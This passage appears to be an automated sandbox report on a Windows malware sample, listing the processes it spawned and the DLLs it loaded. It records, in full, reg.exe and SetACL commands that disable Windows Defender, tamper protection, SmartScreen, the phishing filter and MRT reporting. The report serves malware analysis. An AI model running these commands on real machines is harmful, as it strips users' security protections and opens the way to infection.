Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Ms63nDrOBa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: win_version_csharp.exe.0.dr
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: uxdabweej.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: win_version_csharp.exe.0.drStatic PE information: 0xEFE04B64 [Fri Jul 12 07:53:08 2097 UTC]
Source: SetACL64.exe.0.drStatic PE information: section name: _RDATA

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
